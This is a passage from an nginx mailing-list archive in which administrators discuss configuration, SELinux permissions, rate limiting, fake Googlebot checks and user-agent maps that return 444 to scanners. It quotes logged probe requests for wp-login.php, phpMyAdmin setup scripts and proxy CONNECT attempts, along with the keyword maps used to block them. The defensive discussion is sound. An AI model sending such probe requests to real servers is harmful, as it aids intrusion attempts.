--http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx
--group=nginx --with-http_ssl_module --with-http_realip_module
--with-http_addition_module --with-http_sub_module
--with-http_dav_module --with-http_flv_module --with-http_mp4_module
--with-http_gunzip_module --with-http_gzip_static_module
--with-http_random_index_module --with-http_secure_link_module
--with-http_stub_status_module --with-http_auth_request_module
--with-http_xslt_module=dynamic --with-http_image_filter_module=dynamic
--with-http_geoip_module=dynamic --with-http_perl_module=dynamic
--add-dynamic-module=njs-1c50334fbea6/nginx --with-threads
--with-stream --with-stream_ssl_module --with-http_slice_module
--with-mail --with-mail_ssl_module --with-file-aio --with-ipv6
--with-http_v2_module --with-cc-opt='-O2 -g -pipe -Wall
-Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector-strong
--param=ssp-buffer-size=4 -grecord-gcc-switches -m64 -mtune=generic'
--with-ld-opt=-Wl,-E



___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


MAP location in conf file

2017-12-28 Thread li...@lazygranch.com
Presently I'm putting maps in the server section. Can they be put at
the very top to make them work for all servers? If not, I can just turn
the maps into include files and insert them as needed, but maybe making
the map global is more efficient.
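For reference, nginx only allows the map directive in the http context, so it is inherently "global": define it once before the server blocks and reference the resulting variable in any of them. A minimal sketch (hostnames are placeholders):

```nginx
http {
    # defined once at http level; visible to every server block below
    map $http_user_agent $badagent {
        default      0;
        ~*WordPress  1;
    }

    server {
        server_name one.example.com;
        if ($badagent) { return 444; }
    }

    server {
        server_name two.example.com;
        if ($badagent) { return 444; }
    }
}
```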

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: Centos 7 file permission problem

2017-12-20 Thread li...@lazygranch.com
Well, that was it. You can't believe how many hours I wasted on that.
Thanks. Double thanks. 
I'm going to mention this in the Digital Ocean help pages. 

I disabled SELinux, but I have a book lying around on how to set it up.
Eh, it is on the list. 
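For readers hitting the same permission-denied symptom, the usual fix is to relabel the content rather than disable SELinux. A console sketch, assuming the web root from this thread (commands need root; `semanage` comes from the policycoreutils-python package on CentOS 7):

```
# give the content the SELinux label the web server policy expects
chcon -R -t httpd_sys_content_t /usr/share/nginx/html

# or make the labeling survive a relabel/restorecon:
semanage fcontext -a -t httpd_sys_content_t "/usr/share/nginx/html(/.*)?"
restorecon -R /usr/share/nginx/html
```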

 On Wed, 20 Dec 2017 14:17:18 +0300
Aziz Rozyev <aroz...@nginx.com> wrote:

> Hi,
> 
> have you checked this with disabled selinux ? 
> 
> br,
> Aziz.
> 
> 

Centos 7 file permission problem

2017-12-20 Thread li...@lazygranch.com
I'm setting up a web server on a Centos 7 VPS. I'm relatively sure I
have the firewalls set up properly since I can see my browser requests
in the access and error logs. That said, I have a file permission problem. 

nginx 1.12.2
Linux servername 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20 20:32:50 UTC 2017 
x86_64 x86_64 x86_64 GNU/Linux
 

nginx.conf (with comments removed for brevity and my domain name
removed because of Google)
---
user nginx;
worker_processes auto;
error_log /var/log/nginx/error.log;
pid /run/nginx.pid;

events {
worker_connections 1024;
}

http {
log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
  '$status $body_bytes_sent "$http_referer" '
  '"$http_user_agent" "$http_x_forwarded_for"';

access_log  /var/log/nginx/access.log  main;

sendfile            on;
tcp_nopush          on;
tcp_nodelay         on;
keepalive_timeout   65;
types_hash_max_size 2048;

include             /etc/nginx/mime.types;
default_type        application/octet-stream;

server {
listen 80;
server_name mydomain.com www.mydomain.com;

return 301 https://$host$request_uri;
}

server {
listen   443 ssl  http2;
server_name  mydomain.com www.mydomain.com;
ssl_dhparam /etc/ssl/certs/dhparam.pem;
root /usr/share/nginx/html/mydomain.com/public_html;

ssl_certificate /etc/letsencrypt/live/mydomain.com/fullchain.pem; # managed by 
Certbot
ssl_certificate_key /etc/letsencrypt/live/mydomain.com/privkey.pem; # managed 
by Certbot
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;

location / {
root   /usr/share/nginx/html/mydomain.com/public_html;
index  index.html index.htm;
}
#
error_page 404 /404.html;
location = /40x.html {
}
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
}
}

}

I have firefox set up with no cache and do not save history.
-
access log:

mypi - - [20/Dec/2017:07:46:44 +] "GET /index.html HTTP/2.0" 403 169
"-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0" "-"

myip - - [20/Dec/2017:07:48:44 +] "GET /index.html
HTTP/2.0" 403 169 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0)
Gecko/20100101 Firefox/52.0" "-"
---
error log:

2017/12/20 07:46:44 [error] 10146#0: *48 open() 
"/usr/share/nginx/html/mydomain.com/public_html/index.html" failed (13: 
Permission denied), client: myip, server: mydomain.com, request: "GET 
/index.html HTTP/2.0", host: "mydomain.com"
2017/12/20 07:48:44 [error] 10146#0: *48 open() 
"/usr/share/nginx/html/mydomain.com/public_html/index.html" failed (13: 
Permission denied), client: myip, server: mydomain.com, request: "GET 
/index.html HTTP/2.0", host: "mydomain.com"


Directory permissions:
For now, I made everything 755 with ownership nginx:nginx. I did chmod
and chown with the -R option.

/etc/nginx:
drwxr-xr-x.  4 nginx nginx4096 Dec 20 07:39 nginx

/usr/share/nginx:
drwxr-xr-x.   4 nginx nginx33 Dec 15 08:47 nginx

/var/log:
drwx--. 2 nginx  nginx4096 Dec 20 07:51 nginx
--
systemctl status nginx
● nginx.service - The nginx HTTP and reverse proxy server
   Loaded: loaded (/usr/lib/systemd/system/nginx.service; enabled; vendor 
preset: disabled)
   Active: active (running) since Wed 2017-12-20 04:21:37 UTC; 3h 37min ago
  Process: 10145 ExecReload=/bin/kill -s HUP $MAINPID (code=exited, 
status=0/SUCCESS)
 Main PID: 9620 (nginx)
   CGroup: /system.slice/nginx.service
   ├─ 9620 nginx: master process /usr/sbin/nginx
   └─10146 nginx: worker process


Dec 20 07:18:33 servername systemd[1]: Reloaded The nginx HTTP and reverse 
proxy server.
--

ps aux | grep nginx
root  9620  0.0  0.3  71504  3848 ?Ss   04:21   0:00 nginx: master 
process /usr/sbin/nginx
nginx10146  0.0  0.4  72004  4216 ?S07:18   0:00 nginx: worker 
process
root 10235  0.0  0.0 112660   952 pts/1S+   08:01   0:00 grep ngin

---
firewall-cmd --zone=public --list-all
public (active)
  target: default
  icmp-block-inversion: no
  interfaces: eth0
  sources: 
  services: ssh dhcpv6-client http https
  ports: 
  protocols: 
  masquerade: no
  forward-ports: 
  source-ports: 
  icmp-blocks: 
  rich rules:
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

Re: How to control the total requests in Nginx

2017-11-30 Thread li...@lazygranch.com
Here is a log of real life IP limiting with a 30 connection limit:
86.184.152.14 British Telecommunications PLC
8.37.235.199 Level 3 Communications Inc.
130.76.186.14 The Boeing Company

security.5.bz2:Nov 29 20:50:53 theranch kernel: ipfw: 5005 drop session type 40 
86.184.152.14 58714 -> myip 80, 34 too many entries
security.6.bz2:Nov 29 16:01:31 theranch kernel: ipfw: 5005 drop session type 40 
8.37.235.199 10363 -> myip 80, 42 too many entries
above repeated twice
security.8.bz2:Nov 29 06:39:15 theranch kernel: ipfw: 5005 drop session type 40 
130.76.186.14 34056 -> myip 80, 31 too many entries
above repeated 18 times

I have an Alexa rating around 960,000. Hey, at least I made it to the top one 
million websites. But my point is that even with a limit of 30, I'm kicking out 
readers. 

Look at the nature of the IPs. British Telecom is one of those huge ISPs where 
I guess different users are sharing the same IP. (Not sure.) Level 3 is the 
provider at many Starbucks, besides being a significant traffic carrier. Boeing 
has decent IP space, but maybe only a few IPs per facility. Who knows.

My point is if you set the limit at two, that is way too low. 

The only real way to protect from DDoS is to use a commercial reverse proxy. I 
don't think limiting connections in nginx (or in the firewall) will stop a real 
attack. It will probably stop some kid in his parents' basement. But today you 
can rent DDoS attacks on the dark web. 

If you really want to improve performance of your server, do severe IP 
filtering at the firewall. Limit the number of search engines that can read 
your site. Block major hosting companies and virtual private servers. There are 
no eyeballs there. Just VPNs (who can drop the VPN if they really want to read 
your site) and hackers. Easily half the internet traffic is bots.

Per some discussions on this list, it is best not to block using nginx, but 
rather use the firewall. Nginx parses the http request even if blocking the IP, 
so the CPU load isn't insignificant. As an alternative, you can use a 
reputation based blocking list. (I don't use one on web servers, just on email 
servers.)
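On FreeBSD (the poster's ipfw log excerpts appear elsewhere in this archive), one way to do firewall-level bans is an ipfw table, so blocked traffic never reaches nginx at all. A sketch with placeholder addresses; the rule and table numbers are assumptions:

```
# put banned networks in a table (placeholder address)
ipfw table 1 add 203.0.113.0/24

# drop web traffic from anything in the table, early in the ruleset
ipfw add 100 deny tcp from "table(1)" to me dst-port 80,443
```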

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Response code 400 rather than 404

2017-07-17 Thread li...@lazygranch.com
I'm curious why this request got a 400 response rather than a 404. 

400 123.160.235.162 - - [16/Jul/2017:22:56:30 +] "GET /currentsetting.htm 
HTTP/1.1" 173 "-" "-" "-"

log_format  main  '$status $remote_addr - $remote_user [$time_local] "$request" '
                  '$body_bytes_sent "$http_referer" '
                  '"$http_user_agent" "$http_x_forwarded_for"';
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: FreeBSD Clean Install nginx.pid Permissions Errors

2017-07-13 Thread li...@lazygranch.com
On Thu, 13 Jul 2017 23:46:12 +0100
Francis Daly  wrote:

> On Thu, Jul 13, 2017 at 09:37:08AM -0400, Viaduct Lists wrote:
> 
> Hi there,
> 
> > [Wed Jul 12 06:08:41 rich@neb /var/log/nginx] nginx -t  
> 
> If you were running this command as "root", would that prompt say
> "root@neb" and end with a # ?
> 
> > nginx: the configuration file /usr/local/etc/nginx/nginx.conf
> > syntax is ok nginx: [emerg] open() "/var/run/nginx.pid" failed (13:
> > Permission denied)  
> 
> That might relate to permissions on /, /var, or /var/run, instead of
> on /var/run/nginx.pid.
> 
> But still: from what you've shown, there is no indication that user
> "rich" has the necessary permissions.
> 
> Good luck with it,
> 
> 
From FreeBSD 11.0
/var
drwxr-xr-x  28 root  wheel  512 Jul 12 08:00 var

/var/run
drwxr-xr-x  10 root wheel 1024 Jul 13 03:01 run

/usr/local/www
drwxr-xr-x   5 root  wheel   512 Jun 18 04:13 www

Contents of /usr/local/www
drwxr-xr-x  3 root  wheel  512 Jun 10 00:19 .well-known
drwxr-xr-x  2 root  www512 Jun 12 01:16 acme
lrwxr-xr-x  1 root  wheel   25 Jun 18 04:13 nginx -> /usr/local/www/nginx-dist
dr-xr-xr-x  5 root  wheel  512 Jun 18 04:13 nginx-dist

Contents of /usr/local/www/nginx-dist/
-rw-r--r--  1 root  wheel  537 Jun 18 04:12 50x.html
-rw-r--r--  1 root  wheel    1 Jun 18 04:12 EXAMPLE_DIRECTORY-DONT_ADD_OR_TOUCH_ANYTHING
-rw-r--r--  1 root  wheel  612 Jun 18 04:12 index.html
drwxr-xr-x  2 root  wheel  512 Jun  9 07:00


However the nginx process is owned by www:
 823 www   1  200 28552K  7060K kqread   0:01   0.00% nginx





/var/run/nginx.pid
-rw-r--r--  1 root  wheel   4 Jul 12 08:00 nginx.pid
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: block google app

2017-06-21 Thread li...@lazygranch.com
I'm sending 403 responses now, so I screwed up by mistaking the fields
in the logs. I'm going back to lurking mode again with my tail
shamefully between my legs.  

This code in the image location section will block the google app:

if ($http_user_agent ~* (com.google.GoogleMobile)) {
    return 403;
}
-

403 107.2.5.162 - - [21/Jun/2017:07:21:08 +] "GET /images/photo.jpg 
HTTP/1.1" 140 "-" "com.google.GoogleMobile/28.0.0 iPad/10.3.2 hw/iPad6_7" "-"



___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: block google app

2017-06-21 Thread li...@lazygranch.com
Actually I think I was mistaken and the field is the user agent. I will
change the variable and see what happens. I did some experiments to
show the pattern match works.

On Tue, 20 Jun 2017 20:56:46 -0700
li...@lazygranch.com wrote:

> I want to block by referrer. I provided a more "normal" record so
> that the user agent and referrer location was obvious by context. 
> 
> My problem is I'm not creating the match expression correctly. I've
> tried spaces, parens. I haven't tried quotes. ‎ 
> 
>   Original Message  
> From: Robert Paprocki
> Sent: Tuesday, June 20, 2017 6:47 PM
> To: nginx@nginx.org
> Reply To: nginx@nginx.org
> Subject: Re: block google app
> 
> Well what is your log format then? We can't possibly help you if we
> don't have the necessary info ;)
> 
> Do you want to block based on http referer? Or user agent string? Or
> something else entirely? The config snippet you posted indicates you
> are trying to block by referer. If you want to block a request based
> on the user agent string, you need to use the variable I noted
> ($http_user_agent). 
> 
> Sent from my iPhone
> 
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

Re: block google app

2017-06-20 Thread li...@lazygranch.com
I think the iPad is the user agent. I wiped out that access.log, but
here is a fresh one showing a browser (user agent) in the proper field.

200 76.20.227.211 - - [21/Jun/2017:00:48:45 +] "GET /images/photo.jpg 
HTTP/1.1" 91223 "http://www.mydomain.com/page.html; "Mozilla/5.0 (Linux; 
Android 6.0.1; SM-T350 B
uild/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 
Safari/537.36" "-"

I sanitize these a bit because I don't like this stuff showing up in
google searches, but the basic format is the same. I use a custom log
file format. 


On Tue, 20 Jun 2017 17:49:14 -0700
Robert Paprocki <rpapro...@fearnothingproductions.net> wrote:

> Do you mean $http_user_agent?
> 

___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


block google app

2017-06-20 Thread li...@lazygranch.com
I would like to block the google app from directly downloading images. 

access.log:

200 186.155.157.9 - - [20/Jun/2017:00:35:47 +] "GET /images/photo.jpg 
HTTP/1.1" 334052 "-" "com.google.GoogleMobile/28.0.0 iPad/9.3.5 hw/iPad2_5" "-"


My nginx code in the images location:

if ($http_referer ~* (com.google.GoogleMobile)) {
    return 403;
}

So what I am doing wrong?
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx


Re: WordPress pingback mitigation

2017-05-21 Thread li...@lazygranch.com
Here is the map. I truncated my bad-agent list, but it will get you
started. I used the user agent changer in Chromium to make sure it
worked.
-
map $http_user_agent $badagent {
    default        0;
    ~*WordPress    1;
    ~*kscan        1;
    ~*ache         1;
}

if ($badagent) {
return 444;
}
-

Of course there is always the problem of "scope", that is where to put
this. I have the map after the http {. I assume you have gzip enabled,
so my map starts after the "gzip on;"

The "if" statement is in the server block. I'm assuming you have the
line that stops hotlinking. I put it after that line.

Generically the hotlink blocker line looks like:
  if ($host !~ ^(mydomain.org|www.mydomain.org)$ ) {
 return 444;
  }




On Sun, 21 May 2017 08:14:52 +1000
Alex Samad  wrote:

> Hi
> 
> can you give an example of using a map instead of the if statement ?
> 
> Thanks
> 
> On 21 May 2017 at 02:35, c0nw0nk  wrote:
> 
> > gariac Wrote:
> > ---  
> > > I had run Naxsi with Doxi. Trouble is when it cause problems, it
> > > was really hard to figure out what rule was the problem. I
> > > suppose if you knew what each rule did, Naxsi would be fine.
> > >
> > > That said, my websites are so unsophisticated that it is far
> > > easier for me just to use maps.
> > >
> > > Case in point. When all this Apache Struts hacking started, I
> > > noticed lots of 404s with the word "action" in the url request. I
> > > just added "action" to the map and 444 them.
> > >
> > > If you have an url containing any word used in SQL, Naxsi/Doxi
> > > goes in blocking mode. I recall it was flagging on the word
> > > "update". I had a updates.html and Nasxi/Doxi was having a fit.
> > >
> > > In the end, it was far easier just to use maps. Other than a few
> > > modern constructs like "object-fit contain"‎, my sites have a
> > > 1990s look. Keeping things simple reduces the attack surface.
> > >
> > > I think even with Naxsi, you would need to set up a map to block
> > > bad referrers. I'm amazed at the nasty websites that link to me
> > > for no apparent reason. Case in point, I had a referral from the
> > > al Aqsa Martyrs Brigade. ‎ Terrorists! And numerous porn sites,
> > > all irrelevant. So Naxsi alone isn't sufficient.
> > >
> > >   Original Message
> > > From: c0nw0nk
> > > Sent: Saturday, May 20, 2017 3:36 AM
> > > To: nginx@nginx.org
> > > Reply To: nginx@nginx.org
> > > Subject: Re: WordPress pingback mitigation
> > >
> > > I take it you don't use a WAF of any kind i also think you should
> > > add it to
> > > a MAP at least instead of using IF.
> > >
> > > The WAF I use for these same rules is found here.
> > >
> > > https://github.com/nbs-system/naxsi
> > >
> > > The rules for wordpress and other content management systems are
> > > found here.
> > >
> > > http://spike.nginx-goodies.com/rules/ ( a downloadable list they
> > > use https://bitbucket.org/lazy_dogtown/doxi-rules )
> > >
> > >
> > > Naxsi is the best soloution I have found against problems like
> > > this especialy with their XSS and SQL extensions enabled.
> > >
> > > LibInjectionXss;
> > > CheckRule "$LIBINJECTION_XSS >= 8" BLOCK;
> > > LibInjectionSql;
> > > CheckRule "$LIBINJECTION_SQL >= 8" BLOCK;
> > >
> > >
> > > Blocks allot of zero day exploits and unknown exploits /
> > > penetration testing
> > > techniques.
> > >
> > > If you want to protect your sites it is definitely worth the look
> > > and use.
> > >
> > > Posted at Nginx Forum:
> > > https://forum.nginx.org/read.php?2,274339,274341#msg-274341
> > >
> > > ___
> > > nginx mailing list
> > > nginx@nginx.org
> > > http://mailman.nginx.org/mailman/listinfo/nginx
> > > ___
> > > nginx mailing list
> > > nginx@nginx.org
> > > http://mailman.nginx.org/mailman/listinfo/nginx  
> >
> >
> > It is not actually that hard to read the rules when you understand
> > it.
> >
> > The error.log file tells you.
> >
> > As I helped someone before read and understand their error log
> > output to tell them what naxsi was telling them so they could learn
> > understand and identify what rule is the culprit to their problem.
> >
> > Here is the prime example :
> > https://github.com/nbs-system/naxsi/issues/351#issuecomment-281710763
> >
> > If you read that and see their error.log output from naxsi and view
> > the log it shows you in the log if it was for example "ARGS" or
> > "HEAD" or "POST" etc
> > and the rule ID number responsible. So you can either null it out
> > or create a whitelist for that method.
> >
> > I am not trying to shove it down your neck or anything like that
> > just 

hacker proxy attempt

2017-04-29 Thread li...@lazygranch.com
A bit OT, but can a guru verify that I rejected all these proxy
attempts? I'm 99.9% sure, but I'd hate to allow some spammer or worse
to route through my server. The only edit I made is where they ran my
IP address through a forum spam checker. (I assume google indexes pastebin.)

https://pastebin.com/VCg28AZf

Pastebin made me captcha because they thought I was a spammer. ;-)




Is this a valid request?

2016-11-14 Thread li...@lazygranch.com
I keep my nginx server set up dumb. (I don't need anything fancy at the
moment.) Is the request below possibly valid? I flag anything with a
question mark in it as hacking, but maybe iOS makes some requests that
some websites will process, while others would just ignore everything
after the question mark. 

444 72.49.13.171 - - [14/Nov/2016:06:55:52 +] "GET 
/ttr.htm?sa=X=2=0ahUKEwiB7Nyj1afQAhWJZCYKHWLGAW8Q_B0IETAA HTTP/1.1" 0 
"-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) 
AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/20.3.136880903 Mobile/14B100 
Safari/600.1.4" "-"



Unexpected return code

2016-11-08 Thread li...@lazygranch.com
I only serve static pages, hence I have this in my conf file:

---
## Only allow these request methods ##
if ($request_method !~ ^(GET|HEAD)$ ) {
    return 444;
}

Shouldn't the return code be 444 instead of 400?

400 111.91.67.118 - - [09/Nov/2016:05:18:38 +] "CONNECT 
search.yahoo.com:443 HTTP/1.1" 173 "-" "-" "-"
---

This is more of a curiosity than an issue. 



Re: Hacker log

2016-10-22 Thread li...@lazygranch.com
On Sat, 22 Oct 2016 17:40:56 -0400
"itpp2012"  wrote:

> The idea is nice but pointless, if you maintain this list over 6
> months you most likely will end up blocking just about everyone.
> 
> Stick to common sense with your config, lock down nginx and the
> backends, define proper flood and overflow settings for nginx to deal
> with, anything beyond the scope of nginx should be dealt with by your
> ISP perimeter systems.
> 
> Posted at Nginx Forum:
> https://forum.nginx.org/read.php?2,270485,270486#msg-270486
> 
> ___
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

I've been doing this for more than six months. Clearly I haven't
blocked everyone. ;-)

These requests would just go to 404 if I didn't trap them. I'd rather
save 404 for real missing links.
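A sketch of the kind of "map of triggers" the poster describes. The patterns here are illustrative assumptions, not the poster's actual list; a static-only site can treat any request for server-side tech as hostile:

```nginx
# http level: classify obviously hostile request URIs
map $request_uri $suspicious {
    default        0;
    ~*\.php        1;   # a static-only site serves no PHP
    ~*wp-login     1;   # WordPress probes
    ~*/cgi-bin/    1;
}

# server level: drop the connection instead of burning a 404
if ($suspicious) {
    return 444;
}
```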

My attitude regarding hacking is that if it comes from a place without
eyeballs (hosting, colo, etc.), enjoy your lifetime ban. This keeps the
logs cleaner. Dumb hacking attempts like that clown's could become a real
attack in the future, so better to block them. 

At the very least, you could block all well known cloud services. AWS
for example, but not from email ports. 



Hacker log

2016-10-22 Thread li...@lazygranch.com
http://pastebin.com/7W0uDrLa

If you need an extensive list of hacker requests (over 200), I put this
log entry on pastebin. As mentioned at the top of the pastebin, the
hacker used my IP address directly rather than my domain name. 

I have a "map" that detects typical hacker activity. Perhaps in my "map"
of triggers, I should look for bypassing the domain name, that is
requests directly to my IP address. There is nothing particularly evil
in using my IP address rather than domain name, but would any real user
ever use my IP address? Kind of doubtful.
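One standard way to act on that idea, not spelled out in the thread, is a catch-all default_server: any request whose Host header matches none of the configured names, which includes requests made to the bare IP, never reaches the real sites.

```nginx
# Catch-all for requests by bare IP or unknown Host header.
server {
    listen 80 default_server;
    server_name _;      # matches nothing; default_server does the work
    return 444;         # close the connection without a response
}
```

A matching default_server on port 443 works the same way, but it needs some certificate configured to complete the TLS handshake first.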



Re: fake googlebots

2016-09-28 Thread li...@lazygranch.com
http://pastebin.com/tZZg3RbA/?e=1

This is the access.log file data relevant to that fake googlebot. It
starts with a fake googlebot entry, then goes downhill from there. I
rate limit at 10/s. I only allow the verbs HEAD and GET, so the POST
went to 444 directly.

I replaced the domain with a fake one.



fake googlebots

2016-09-25 Thread li...@lazygranch.com
I got a spoofed googlebot hit. It was easy to detect since there were
probably a hundred requests that triggered my hacker detection map
scheme. Only two requests received a 200 return and both were harmless.

200 118.193.176.53 - - [25/Sep/2016:17:45:23 +] "GET / HTTP/1.1" 847 "-" 
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"

For the fake googlebot:
# host 118.193.176.53
Host 53.176.193.118.in-addr.arpa not found: 3(NXDOMAIN)

For a real googlebot:
# host 66.249.69.184
184.69.249.66.in-addr.arpa domain name pointer 
crawl-66-249-69-184.googlebot.com.

IP2Location shows it is a Chinese ISP:
http://www.ip2location.com/118.193.176.53

Nginx has a reverse DNS module:
https://github.com/flant/nginx-http-rdns
I see it has a 10.1 issue:
https://github.com/flant/nginx-http-rdns/issues/8

Presuming this bug gets fixed, does anyone have code to verify
googlebots? Or some other method?
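Outside nginx, the check Google itself recommends is forward-confirmed reverse DNS: PTR lookup on the client IP, require a googlebot.com/google.com hostname, then confirm the forward lookup returns the same IP. A minimal Python sketch of that logic (stdlib only; the lookups obviously need network access):

```python
import socket

def is_google_hostname(hostname):
    """True only if the PTR name is inside Google's crawler domains."""
    return hostname.endswith(".googlebot.com") or hostname.endswith(".google.com")

def verify_googlebot(ip):
    """Forward-confirmed reverse DNS check for a claimed Googlebot IP."""
    try:
        hostname = socket.gethostbyaddr(ip)[0]          # reverse (PTR) lookup
    except (socket.herror, socket.gaierror):
        return False                                    # e.g. NXDOMAIN -> fake bot
    if not is_google_hostname(hostname):
        return False
    try:
        return ip in socket.gethostbyname_ex(hostname)[2]   # forward-confirm
    except socket.gaierror:
        return False
```

The suffix check matters: a fake bot can put "googlebot" anywhere in a hostname it controls, but it cannot make the PTR record for its IP resolve under googlebot.com and have the forward lookup round-trip.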



Re: limit-req and greedy UAs

2016-09-13 Thread li...@lazygranch.com
Seeing that nobody beat me to it, I did the download manager
experiment. There are plugins for Chromium to do multiple connections,
but I figured a standalone program was safer. (No use adding strange
software to a reasonably secure browser.)

My Linux distro has prozilla in the repo. In true Linux tradition, the
actual executable is not prozilla but rather proz.
I requested 8 connections, but I could never get more than 5 running at
a time. I allow 10 in the setup, so something else is the limiting
factor. Be that as it may, I achieved multiple connections, which is
all that is required to test the rate limiting.

Using proz, I achieved about 4 Mbps when all connections were running.
Just downloading from the browser, the network manager reports rates of
500 to 600 kilobytes/second.

Conclusion: nginx rate limiting is not "gamed" by using multiple
connections to download ONE file using a file manager.

The next experiment was to download two different files at 4 connections
each with the file manager. I got 1.1 Mbps and 1.4 Mbps, which summed
together is actually less than the rate limit.

Conclusion: nginx rate limiting still works with 8 connections.

Someone else should try to duplicate this in the event it has something
to do with my setup.



On Mon, 12 Sep 2016 15:30:01 -0700
li...@lazygranch.com wrote:

> Most of the chatter on the interwebs believes that the rate limit is
> per connection, so if some IP opens up multiple connections, they get
> more bandwidth. 
> 
> It shouldn't be that hard to just test this by installing a manager
> and seeing what happens. I will give this a try tonight, but
> hopefully someone will beat me to it.
> 
> Relevant post follows:
> ‎---
> On 17 February 2014 10:02, Bozhidara Marinchovska
>  wrote:‎
> > My question is what may be the reason when downloading the example
> > file with download manager not to match limit_rate directive
> 
> "Download managers" open multiple connections and grab different byte
> ranges of the same file across those connections. Nginx's limit_rate
> function limits the data transfer rate of a single connection.‎
> 
> ‎
> http://mailman.nginx.org/pipermail/nginx/2014-February/042337.html
> ---
> ‎
>   Original Message  
> From: Richard Stanway
> Sent: Monday, September 12, 2016 2:39 PM
> To: nginx@nginx.org
> Reply To: nginx@nginx.org
> Subject: Re: limit-req and greedy UAs
> 
> limit_req works with multiple connections, it is usually configured
> per IP using $binary_remote_addr. See
> http://nginx.org/en/docs/http/ngx_http_limit_req_module.html#limit_req_zone
> - you can use variables to set the key to whatever you like.
> 
> limit_req generally helps protect eg your backend against request
> floods from a single IP and any amount of connections. limit_conn
> protects against excessive connections tying up resources on the
> webserver itself.
> 
> On Mon, Sep 12, 2016 at 10:23 PM, Grant <emailgr...@gmail.com> wrote:
> > https://www.nginx.com/blog/tuning-nginx/
> >
> > I have far more faith in this write up regarding tuning than the
> > anti-ddos, though both have similarities.
> >
> > My interpretation is the user bandwidth is connections times rate.
> > But you can't limit the connection to one because (again my
> > interpretation) there can be multiple users behind one IP. Think of
> > a university reading your website. Thus I am more comfortable
> > limiting bandwidth than I am limiting the number of
> > connections. The 512k rate limit is fine. I wouldn't go any higher.
> 
> 
> If I understand correctly, limit_req only works if the same connection
> is used for each request.  My goal with limit_conn and limit_conn_zone
> would be to prevent someone from circumventing limit_req by opening a
> new connection for each request.  Given that, why would my
> limit_conn/limit_conn_zone config be any different from my
> limit_req/limit_req_zone config?
> 
> - Grant
> 
> 
> > Should I basically duplicate my limit_req and limit_req_zone
> > directives into limit_conn and limit_conn_zone? In what sort of
> > situation would someone not do that?
> >
> > - Grant
> 
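To make the per-IP behavior described in the quoted reply concrete: limit_req keyed on $binary_remote_addr counts requests per client address, no matter how many separate connections carry them, so opening a new connection per request does not circumvent it. A rough sketch (zone name, size, rate, and burst are illustrative assumptions):

```nginx
http {
    # requests are counted against the client IP, not the connection
    limit_req_zone $binary_remote_addr zone=perip:10m rate=10r/s;

    server {
        location / {
            # allow short bursts of up to 20 queued requests;
            # requests beyond that are rejected (503 by default)
            limit_req zone=perip burst=20;
        }
    }
}
```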


Re: Problems with custom log file format

2016-08-23 Thread li...@lazygranch.com
Link goes to conf file
https://www.dropbox.com/s/1gz5139s4q3b7e0/nginx.conf?dl=0


On Tue, 23 Aug 2016 20:51:55 +0300
"Reinis Rozitis"  wrote:

> > Configuration file included in the post. I already checked it.
> 
> You have shown only few excerpts (like there might be other
> access_log directives in other parts included config files (easily
> missed when doing include path/*.conf) etc).
> 
> For example if you can reproduce the issue with such config (I
> couldn't) there might be a bug in the software:
> 
> events {}
> http {
> log_format main '$status $remote_addr - $remote_user
> [$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
> '"$http_user_agent" "$http_x_forwarded_for"';
> access_log  logs/access.log main;
> server {}
> }
> 
> rr 
> 



Problems with custom log file format

2016-08-21 Thread li...@lazygranch.com
Nginx 1.10.1,2 

FreeBSD 10.2-RELEASE-p18 #0: Sat May 28 08:53:43 UTC 2016


I'm using the "map" module to detect obvious hacking attempts by
matching keywords. (Yes, I know about Naxsi.) Finding the really dumb
hacks is easy. I give them a 444 return code, the idea being that I can
run a script on the log file and block those IPs. (Yes, I know about
swatch.)

My problem is that access.log isn't written in the custom format all
the time. I have many examples, but these are representative: the first
group has the 444 status at the start of the line (custom format); the
next group uses the default format.
--
444 111.91.62.144 - - [21/Aug/2016:09:31:50 +] "GET /wp-login.php HTTP/1.1" 
0 "-" "Mozilla/5.0 (Windows NT 6.1; WO
W64; rv:40.0) Gecko/20100101 Firefox/40.1" "-"
444 175.123.98.240 - - [21/Aug/2016:04:39:44 +] "GET /manager/html 
HTTP/1.1" 0 "-" "Mozilla/5.0 (Windows NT 5.1; r
v:5.0) Gecko/20100101 Firefox/5.0" "-"
444 103.253.14.43 - - [21/Aug/2016:05:43:15 +] "GET /admin/config.php 
HTTP/1.1" 0 "-" "python-requests/2.10.0" "-"
444 185.130.6.49 - - [21/Aug/2016:14:23:09 +] "GET 
//phpMyAdmin/scripts/setup.php HTTP/1.1" 0 "-" "-" "-"


176.26.5.107 - - [21/Aug/2016:09:43:20 +] "GET /wp-login.php HTTP/1.1" 444 
0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW
64; rv:40.0) Gecko/20100101 Firefox/40.1"
195.90.204.103 - - [21/Aug/2016:17:09:11 +] "GET /wordpress/wp-admin/ 
